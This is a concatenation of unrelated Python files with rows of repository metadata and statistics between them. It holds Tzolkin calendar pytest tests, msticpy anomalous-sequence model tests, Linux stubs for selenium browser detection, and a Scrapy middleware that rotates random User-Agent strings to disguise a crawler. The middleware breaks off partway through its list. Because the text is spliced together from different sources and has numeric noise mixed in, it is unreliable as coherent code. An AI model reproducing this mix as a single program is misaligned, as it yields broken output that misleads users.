        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    assert to_test.getDayNumber() == tzolkin.number  # nosec
    assert to_test.getDayNameNumber() == tzolkin.name  # nosec
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_fromIsoFormat(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.fromIsoFormat` against the local reference dates.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    # Convert the local date format to an ISO date string first.
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    to_test = Tzolkin.fromIsoFormat(date_str=gregorian_date.isoformat())
    assert to_test.getDayNumber() == tzolkin.number  # nosec
    assert to_test.getDayNameNumber() == tzolkin.name  # nosec
################################################################################
def test_fromToday() -> None:
    """`Tzolkin.fromToday` must match `Tzolkin.fromDate` for today's date."""
    from_today = Tzolkin.fromToday()
    expected = Tzolkin.fromDate(date=datetime.date.today())
    assert from_today.getDayName() == expected.getDayName()  # nosec
    assert from_today.getDayNumber() == expected.getDayNumber()  # nosec
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getTzolkinDate(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getTzolkinDate` against the local reference dates.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    to_test = Tzolkin.fromDate(gregorian_date)
    assert to_test.getTzolkinDate().number == tzolkin.number  # nosec
    assert to_test.getTzolkinDate().name == tzolkin.name  # nosec
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getTzolkinYearDay(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getTzolkinYearDay` against the local reference dates.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    to_test = Tzolkin.fromDate(gregorian_date)
    assert to_test.getTzolkinYearDay() == getTzolkinDay(tzolkin)  # nosec
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getNextDate(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getNextDate` against `nextTzolkin`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    # Start the search one day before the reference date.
    gregorian_date = datetime.datetime.strptime(
        gregorian, USED_DATEFMT
    ).date() - datetime.timedelta(days=1)
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    assert to_test.getNextDate(start_date=gregorian_date) == nextTzolkin(  # nosec
        tzolkin=tzolkin, starting=gregorian_date
    )
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getNextDateToday(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getNextDate` with its default start date (today).

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    assert to_test.getNextDate() == nextTzolkin(  # nosec
        tzolkin=tzolkin, starting=datetime.date.today()
    )
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getNextDateList(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getNextDateList` against `tzolkin2gregorian`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    # Start the search one day before the reference date.
    gregorian_date = datetime.datetime.strptime(
        gregorian, USED_DATEFMT
    ).date() - datetime.timedelta(days=1)
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    tz_list = to_test.getNextDateList(start_date=gregorian_date)
    good_list = tzolkin2gregorian(
        tzolkin=tzolkin, start=gregorian_date, num_results=50, forward=True
    )
    assert len(tz_list) == 50  # nosec
    for produced, expected in zip(tz_list, good_list):
        assert produced == expected  # nosec
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getLastDate(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getLastDate` against `lastTzolkin`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    # Start the backwards search one day after the reference date.
    gregorian_date = datetime.datetime.strptime(
        gregorian, USED_DATEFMT
    ).date() + datetime.timedelta(days=1)
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    assert to_test.getLastDate(start_date=gregorian_date) == lastTzolkin(  # nosec
        tzolkin=tzolkin, starting=gregorian_date
    )
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getLastDateToday(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getLastDate` with its default start date (today).

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    assert to_test.getLastDate() == lastTzolkin(  # nosec
        tzolkin=tzolkin, starting=datetime.date.today()
    )
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getLastDateList(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.getLastDateList` against `tzolkin2gregorian`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    # Start the backwards search one day before the reference date.
    gregorian_date = datetime.datetime.strptime(
        gregorian, USED_DATEFMT
    ).date() - datetime.timedelta(days=1)
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    tz_list = to_test.getLastDateList(start_date=gregorian_date)
    good_list = tzolkin2gregorian(
        tzolkin=tzolkin, start=gregorian_date, num_results=50, forward=False
    )
    assert len(tz_list) == 50  # nosec
    for produced, expected in zip(tz_list, good_list):
        assert produced == expected  # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_addDays(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
    """Test `Tzolkin.addDays`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
        days: Number of days to add (Hypothesis-generated, 1..260).
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    tzolkin_start = Tzolkin.fromDate(date=gregorian_date).getTzolkinDate()
    # Sanity check the starting point against the reference table.
    assert tzolkin_start.number == tzolkin.number  # nosec
    assert tzolkin_start.name == tzolkin.name  # nosec
    tzolkin_add = Tzolkin.fromDate(date=gregorian_date).addDays(days).getTzolkinDate()
    assert getTzolkinDiff(tzolkin_start, tzolkin_add) == days  # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_addTimedelta(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
    """Test `Tzolkin.addTimedelta`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
        days: Number of days to add (Hypothesis-generated, 1..260).
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    tzolkin_start = Tzolkin.fromDate(date=gregorian_date).getTzolkinDate()
    # Sanity check the starting point against the reference table.
    assert tzolkin_start.number == tzolkin.number  # nosec
    assert tzolkin_start.name == tzolkin.name  # nosec
    tzolkin_add = (
        Tzolkin.fromDate(date=gregorian_date)
        .addTimedelta(datetime.timedelta(days=days))
        .getTzolkinDate()
    )
    assert getTzolkinDiff(tzolkin_start, tzolkin_add) == days  # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getDayDiff(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
    """Test `Tzolkin.getDayDiff`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
        days: Day distance to verify (Hypothesis-generated, 1..260).
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    tzolkin_start = Tzolkin.fromDate(date=gregorian_date)
    # Sanity check the starting point against the reference table.
    assert tzolkin_start.getTzolkinDate().number == tzolkin.number  # nosec
    assert tzolkin_start.getTzolkinDate().name == tzolkin.name  # nosec
    tzolkin_add = Tzolkin.fromDate(date=gregorian_date).addTimedelta(
        datetime.timedelta(days=days)
    )
    assert tzolkin_start.getDayDiff(other=tzolkin_add) == days  # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_getDayTimedelta(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
    """Test `Tzolkin.getDayTimedelta`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
        days: Day distance to verify (Hypothesis-generated, 1..260).
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    tzolkin_start = Tzolkin.fromDate(date=gregorian_date)
    # Sanity check the starting point against the reference table.
    assert tzolkin_start.getTzolkinDate().number == tzolkin.number  # nosec
    assert tzolkin_start.getTzolkinDate().name == tzolkin.name  # nosec
    tzolkin_add = Tzolkin.fromDate(date=gregorian_date).addTimedelta(
        datetime.timedelta(days=days)
    )
    assert tzolkin_start.getDayTimedelta(other=tzolkin_add).days == days  # nosec
################################################################################
def test_getNameNumberFromName() -> None:
    """`Tzolkin.getNameNumberFromName` must invert the `day_names` mapping."""
    for number, name in day_names.items():
        assert Tzolkin.getNameNumberFromName(name_str=name) == number  # nosec
################################################################################
def test_getNameNumberFromNameExc() -> None:
    """`Tzolkin.getNameNumberFromName` must raise on an unknown day name."""
    with pytest.raises(TzolkinException) as exc_info:
        Tzolkin.getNameNumberFromName(name_str="BLA")
    assert exc_info  # nosec
################################################################################
def test_getTzolkinCalendar() -> None:
    """Check `Tzolkin.getTzolkinCalendar` against the generated lookup table."""
    calendar = Tzolkin.getTzolkinCalendar()
    # A Tzolkin year has 260 distinct days.
    assert len(calendar) == 260  # nosec
    for key, entry in makeLookUpTable().items():
        expected = "{number} {name}".format(
            number=entry.number, name=day_names[entry.name]
        )
        assert calendar[key - 1] == expected  # nosec
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_print(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.__repr__` against the reference `TzolkinDate`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
    # Use the builtin repr() instead of calling __repr__ directly.
    assert repr(to_test) == repr(tzolkin)  # nosec
| 37.097915
| 86
| 0.549916
| 4,973
| 40,919
| 4.386688
| 0.037603
| 0.153381
| 0.20816
| 0.066422
| 0.889617
| 0.88187
| 0.87504
| 0.854412
| 0.844144
| 0.836489
| 0
| 0.191476
| 0.243139
| 40,919
| 1,102
| 87
| 37.131579
| 0.512916
| 0.031868
| 0
| 0.857143
| 0
| 0
| 0.202138
| 0
| 0
| 0
| 0
| 0
| 0.041247
| 1
| 0.024145
| false
| 0
| 0.008048
| 0
| 0.032193
| 0.001006
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74e30aa7b5127ad9c144ab287ebe19ae8353d417
| 6,979
|
py
|
Python
|
tests/analysis/test_anom_seq_model.py
|
kubajir/msticpy
|
7b319b71b191b5f75dcf9afd87492523a74b5ad7
|
[
"MIT"
] | 820
|
2019-05-16T07:24:34.000Z
|
2022-03-31T09:18:10.000Z
|
tests/analysis/test_anom_seq_model.py
|
kubajir/msticpy
|
7b319b71b191b5f75dcf9afd87492523a74b5ad7
|
[
"MIT"
] | 205
|
2019-06-24T19:24:19.000Z
|
2022-03-30T23:13:46.000Z
|
tests/analysis/test_anom_seq_model.py
|
kubajir/msticpy
|
7b319b71b191b5f75dcf9afd87492523a74b5ad7
|
[
"MIT"
] | 171
|
2019-06-23T13:53:12.000Z
|
2022-03-29T18:22:46.000Z
|
import unittest
from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
from msticpy.analysis.anomalous_sequence.model import Model
from msticpy.common.exceptions import MsticpyException
class TestModel(unittest.TestCase):
    def setUp(self) -> None:
        """Create three session fixtures of increasing richness.

        Each fixture is a list of sessions; each session is a list of
        commands executed in order.
        """
        # Sessions as plain command-name strings (no parameters).
        self.sessions1 = [
            ["Set-User", "Set-User"],
            ["Set-Mailbox", "Set-User", "Set-User"],
        ]
        # Sessions as Cmd objects with a *set* of parameter names.
        self.sessions2 = [
            [
                Cmd("Set-User", {"Identity"}),
                Cmd("Set-User", {"Identity", "City", "Name"}),
            ],
            [
                Cmd("Set-Mailbox", {"Identity"}),
                Cmd("Set-User", {"Identity", "City"}),
                Cmd("Set-User", {"Identity"}),
            ],
        ]
        # Sessions as Cmd objects with a parameter-name -> value *dict*.
        self.sessions3 = [
            [
                Cmd("Set-User", {"Identity": "blah"}),
                Cmd("Set-User", {"Identity": "haha", "City": "york", "Name": "bob"}),
            ],
            [
                Cmd("Set-Mailbox", {"Identity": "blah"}),
                Cmd("Set-User", {"Identity": "blah", "City": "london"}),
                Cmd("Set-User", {"Identity": "haha"}),
            ],
        ]
def tearDown(self) -> None:
self.sessions1 = None
self.sessions2 = None
self.sessions3 = None
def test__init__(self):
self.assertRaises(MsticpyException, lambda: Model(sessions=[]))
self.assertRaises(MsticpyException, lambda: Model(sessions=[[]]))
self.assertRaises(MsticpyException, lambda: Model(sessions=["Set-User"]))
self.assertRaises(MsticpyException, lambda: Model(sessions=[["Set-User"], []]))
self.assertRaises(
Exception, lambda: Model(sessions=[[{"Set-User": {"Identity"}}]])
)
def test_train(self):
model = Model(sessions=self.sessions1)
model.train()
self.assertTrue(model.seq1_counts is not None)
self.assertTrue(model.seq2_counts is not None)
self.assertTrue(model.prior_probs is not None)
self.assertTrue(model.trans_probs is not None)
self.assertTrue(model.param_counts is None)
self.assertTrue(model.cmd_param_counts is None)
self.assertTrue(model.param_probs is None)
self.assertTrue(model.param_cond_cmd_probs is None)
self.assertTrue(model.value_counts is None)
self.assertTrue(model.param_value_counts is None)
self.assertTrue(model.value_probs is None)
self.assertTrue(model.value_cond_param_probs is None)
self.assertTrue(model.modellable_params is None)
model = Model(sessions=self.sessions2)
model.train()
self.assertTrue(model.seq1_counts is not None)
self.assertTrue(model.seq2_counts is not None)
self.assertTrue(model.prior_probs is not None)
self.assertTrue(model.trans_probs is not None)
self.assertTrue(model.param_counts is not None)
self.assertTrue(model.cmd_param_counts is not None)
self.assertTrue(model.param_probs is not None)
self.assertTrue(model.param_cond_cmd_probs is not None)
self.assertTrue(model.value_counts is None)
self.assertTrue(model.param_value_counts is None)
self.assertTrue(model.value_probs is None)
self.assertTrue(model.value_cond_param_probs is None)
self.assertTrue(model.modellable_params is None)
model = Model(sessions=self.sessions3)
model.train()
self.assertTrue(model.seq1_counts is not None)
self.assertTrue(model.seq2_counts is not None)
self.assertTrue(model.prior_probs is not None)
self.assertTrue(model.trans_probs is not None)
self.assertTrue(model.param_counts is not None)
self.assertTrue(model.cmd_param_counts is not None)
self.assertTrue(model.param_probs is not None)
self.assertTrue(model.param_cond_cmd_probs is not None)
self.assertTrue(model.value_counts is not None)
self.assertTrue(model.param_value_counts is not None)
self.assertTrue(model.value_probs is not None)
self.assertTrue(model.value_cond_param_probs is not None)
self.assertTrue(model.modellable_params is not None)
def test_compute_setof_params_cond_cmd(self):
model = Model(sessions=self.sessions1)
model.train()
self.assertRaises(
Exception, lambda: model.compute_setof_params_cond_cmd(use_geo_mean=False)
)
model = Model(sessions=self.sessions2)
model.train()
model.compute_setof_params_cond_cmd(use_geo_mean=False)
self.assertTrue(len(model.set_params_cond_cmd_probs) > 0)
model = Model(sessions=self.sessions3)
model.train()
model.compute_setof_params_cond_cmd(use_geo_mean=False)
self.assertTrue(len(model.set_params_cond_cmd_probs) > 0)
model = Model(sessions=self.sessions3)
self.assertRaises(
Exception, lambda: model.compute_setof_params_cond_cmd(use_geo_mean=False)
)
def test_compute_scores(self):
model = Model(sessions=self.sessions3)
self.assertRaises(
MsticpyException, lambda: model.compute_scores(use_start_end_tokens=True)
)
model.train()
model.compute_scores(use_start_end_tokens=True)
self.assertTrue(model.session_likelihoods is not None)
self.assertTrue(model.session_geomean_likelihoods is not None)
self.assertTrue(2 in model.rare_window_likelihoods)
self.assertTrue(3 in model.rare_window_likelihoods)
self.assertTrue(2 in model.rare_windows)
self.assertTrue(3 in model.rare_windows)
def test_compute_likelihoods_of_sessions(self):
model = Model(sessions=self.sessions3)
self.assertRaises(
MsticpyException,
lambda: model.compute_likelihoods_of_sessions(use_start_end_tokens=True),
)
model.train()
model.compute_likelihoods_of_sessions(use_start_end_tokens=True)
self.assertTrue(model.session_likelihoods is not None)
def test_compute_rarest_windows(self):
model = Model(sessions=self.sessions2)
self.assertRaises(
MsticpyException,
lambda: model.compute_rarest_windows(
window_len=3, use_start_end_tokens=True, use_geo_mean=False
),
)
model.train()
model.compute_rarest_windows(
window_len=3, use_start_end_tokens=True, use_geo_mean=False
)
self.assertTrue(3 in model.rare_window_likelihoods)
self.assertTrue(3 in model.rare_windows)
model = Model(sessions=self.sessions2)
model.train()
model.compute_rarest_windows(
window_len=3, use_start_end_tokens=True, use_geo_mean=True
)
self.assertTrue(3 in model.rare_window_likelihoods_geo)
self.assertTrue(3 in model.rare_windows_geo)
# Allow running this test module directly (outside a test runner).
if __name__ == "__main__":
    unittest.main()
| 39.88
| 87
| 0.64995
| 835
| 6,979
| 5.215569
| 0.100599
| 0.167164
| 0.183238
| 0.195408
| 0.876234
| 0.83031
| 0.770838
| 0.736625
| 0.6907
| 0.626177
| 0
| 0.00686
| 0.24803
| 6,979
| 174
| 88
| 40.109195
| 0.82298
| 0
| 0
| 0.529412
| 0
| 0
| 0.043846
| 0
| 0
| 0
| 0
| 0
| 0.405229
| 1
| 0.052288
| false
| 0
| 0.026144
| 0
| 0.084967
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74fef52e65af6b2e2da81eef2f283c35a83e60c8
| 408
|
py
|
Python
|
python/yt_videos_list/download/selenium_linux.py
|
Shail-Shouryya/automate_YouTube-Channel-Videos-List
|
b63bbebb7caacc5e99ebf5dc95387d505069953d
|
[
"Apache-2.0"
] | null | null | null |
python/yt_videos_list/download/selenium_linux.py
|
Shail-Shouryya/automate_YouTube-Channel-Videos-List
|
b63bbebb7caacc5e99ebf5dc95387d505069953d
|
[
"Apache-2.0"
] | null | null | null |
python/yt_videos_list/download/selenium_linux.py
|
Shail-Shouryya/automate_YouTube-Channel-Videos-List
|
b63bbebb7caacc5e99ebf5dc95387d505069953d
|
[
"Apache-2.0"
] | null | null | null |
def verify_browser_exists(browser):
    """Stub: browser detection is not yet implemented on Linux.

    Parameters
    ----------
    browser :
        Accepted for API parity with the Windows/macOS modules; unused.

    Raises
    ------
    NotImplementedError
        Always. ``NotImplementedError`` subclasses ``RuntimeError``, so any
        existing callers catching ``RuntimeError`` keep working.
    """
    raise NotImplementedError('Browser detection and automatic selenium updates are not yet available for Linux distributions!\nPlease update your selenium driver manually.')
def get_browser_version(browser):
    """Stub: browser version detection is not yet implemented on Linux.

    Parameters
    ----------
    browser :
        Accepted for API parity with the Windows/macOS modules; unused.

    Raises
    ------
    NotImplementedError
        Always. ``NotImplementedError`` subclasses ``RuntimeError``, so any
        existing callers catching ``RuntimeError`` keep working.
    """
    raise NotImplementedError('Browser version detection and automatic selenium updates are not yet available for Linux distributions!\nPlease update your selenium driver manually.')
| 81.6
| 172
| 0.840686
| 53
| 408
| 6.396226
| 0.471698
| 0.070796
| 0.141593
| 0.182891
| 0.672566
| 0.672566
| 0.672566
| 0.672566
| 0.672566
| 0.672566
| 0
| 0
| 0.110294
| 408
| 4
| 173
| 102
| 0.933884
| 0
| 0
| 0
| 0
| 0.5
| 0.710784
| 0.107843
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d1021c32729a7a9fa5c037ceb56f6ed74e064c5
| 3,974
|
py
|
Python
|
supports/proxyPool/scrapy/RandomUserAgentMiddleware.py
|
LuckyNicky/pycrawler
|
4b3fe2f6e8e51f236d95a64a89a44199e4e97743
|
[
"Apache-2.0"
] | 1
|
2020-04-02T17:03:39.000Z
|
2020-04-02T17:03:39.000Z
|
supports/proxyPool/scrapy/RandomUserAgentMiddleware.py
|
LuckyNicky/pycrawler
|
4b3fe2f6e8e51f236d95a64a89a44199e4e97743
|
[
"Apache-2.0"
] | null | null | null |
supports/proxyPool/scrapy/RandomUserAgentMiddleware.py
|
LuckyNicky/pycrawler
|
4b3fe2f6e8e51f236d95a64a89a44199e4e97743
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
import random
"""
随机更换 User-agent 的中间件
@Author monkey
@Date 2017-12-16
"""
class RandomUserAgentMiddleware(object):
    """Scrapy downloader middleware that sets a random User-Agent per request.

    (Original Chinese docstrings translated: "middleware that randomly
    swaps the User-agent". @Author monkey, @Date 2017-12-16.)
    """

    # Pool of desktop browser User-Agent strings rotated at random.
    UserAgent_List = [
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
